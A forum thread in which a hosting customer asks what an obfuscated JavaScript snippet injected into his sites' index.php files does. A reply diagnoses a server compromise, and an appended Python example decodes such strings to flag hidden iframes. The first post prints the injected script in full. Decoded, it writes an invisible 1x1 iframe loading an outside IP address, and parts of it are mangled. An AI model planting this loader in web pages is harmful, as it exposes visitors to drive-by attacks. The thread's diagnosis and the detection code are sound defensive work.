
Thread: SUSE index files being injected with Javascript code. Threat?

  1. #1
    pkfrizzlefry NNTP User

    SUSE index files being injected with Javascript code. Threat?

    Apparently a lot of the index.php files on multiple sites I host on a SUSE box hosted on a oneandone dedicated server are being injected with the javascript code I posted below...

    It opens up a frontpage office install on winxp when you go to the sites...

    Anyone know what the code below is doing and what the threat level is?

    I cleaned it up on some sites but left it on one for now as I don't know what it does.

    Anyone know?

    Infected site: mybalroom.com

    Greatly appreciate your time
    Pete


    ----code being injected
    <script language='javascript'>function cirpfjyua(lsolytfeqrzhg, nzndhq){var jyaghrpagphcgiuwrxh = "";for (var i = 0 ; i < lsolytfeqrzhg.length; ++i) xyloqymhhfkqdhgu += String.fromCharCode(nzncirpfjyuacirpfjyuacirpfjyua dhq ^(nzndhq ^ lsolytfeqrzhg.charCodeAt(i)));return xyloqymhhfkqdhgu;}var lsolytfeqrzhg = "\x20\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\ x77\x72\x69\x74\x65\x28\x27\x3c\x64\x69\x76\x20\x7 3\x74\x79\x6c\x65\x3d\x22\x76\x69\x73\x69\x62\x69\ x6c\x69\x74\x79\x3a\x68\x69\x64\x64\x65\x6e\x22\x3 e\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\ x22\x68\x74\x74\x70\x3a\x2f\x2f\x38\x35\x2e\x31\x3 7\x2e\x31\x34\x33\x2e\x31\x35\x32\x2f\x22\x20\x77\ x69\x64\x74\x68\x3d\x31\x20\x68\x65\x69\x67\x68\x7 4\x3d\x31\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\ x3c\x2f\x64\x69\x76\x3e\x27\x29\x3b\x0d\x0a\x0d\x0 a"; var xyloqymhhfkqdhgu = cirpfjyua(lsolytfeqrzhg, 121); eval(xyloqymhhfkqdhgu); </script>
    --------END---------

  2. #2
    Join Date: Jun 2008
    Location: Finland, European Union
    Posts: 1,879

    Re: SUSE index files being injected with Javascript code.thr

    Looks like your server got 'pwned', most likely via a cross scripting vulnerability in some of your software. Remove them all ASAP.

    What distribution version, what Apache, are you running Suhosin hardening?

    I would investigate all php scripts and similar software running on your server if they've had any security patches as of late - for example phpbb, joomlas, etc. software that you may be running.
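
An added example, not part of the original thread: one way to read what a script of this shape would write into the page, by decoding its `\xNN` string as data instead of running it. It assumes the decoder XORs each character with the same key twice, so the key cancels out; the sample input, the placeholder address and the names `analyse`, `decode_literal`, `hex_escape` and `dec` are constructed for illustration.

```python
import re

# A string literal made only of \xNN escapes. Whitespace is tolerated anywhere,
# because forum software breaks long strings with stray spaces.
HEX_LITERAL = re.compile(r'"((?:\s*\\\s*x\s*[0-9a-fA-F]\s*[0-9a-fA-F])+)\s*"')
IFRAME_SRC = re.compile(r'<iframe[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN = re.compile(r'visibility\s*:\s*hidden|display\s*:\s*none'
                    r'|(?:width|height)\s*=\s*["\']?[01]\b', re.I)


def decode_literal(body, key1=0, key2=0):
    """Decode the escapes as data (nothing is executed), then apply
    key1 ^ (key2 ^ c) per character; equal keys cancel out."""
    digits = re.sub(r'[\s\\xX]', '', body)
    return "".join(chr(key1 ^ (key2 ^ b)) for b in bytes.fromhex(digits))


def analyse(html, key1=0, key2=0):
    """Return one finding per hex-escaped literal found in the page source."""
    findings = []
    for match in HEX_LITERAL.finditer(html):
        text = decode_literal(match.group(1), key1, key2)
        findings.append({
            "decoded": text.strip(),
            "iframes": IFRAME_SRC.findall(text),
            "hidden": bool(HIDDEN.search(text)),
        })
    return findings


def hex_escape(text):
    """Helper used only to build the constructed sample below."""
    return "".join("\\x%02x" % ord(c) for c in text)


# Constructed sample, not the script from the thread: same shape, but the
# iframe points at 192.0.2.10, an address reserved for documentation.
_PAYLOAD = (' \r\ndocument.write(\'<div style="visibility:hidden"><iframe '
            'src="http://192.0.2.10/" width=1 height=1></iframe></div>\');\r\n')
_ESC = hex_escape(_PAYLOAD)
SAMPLE = ("<script language='javascript'>var s = \""
          + _ESC[:41] + " " + _ESC[41:91] + " " + _ESC[91:]
          + "\"; eval(dec(s, 121));</script>")

if __name__ == "__main__":
    for finding in analyse(SAMPLE, 121, 121):
        print(finding)
```

A finding with `hidden` set and an `iframes` entry pointing off-site means every visitor's browser is silently loading a third-party page, so the affected files should be treated as compromised rather than merely defaced.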
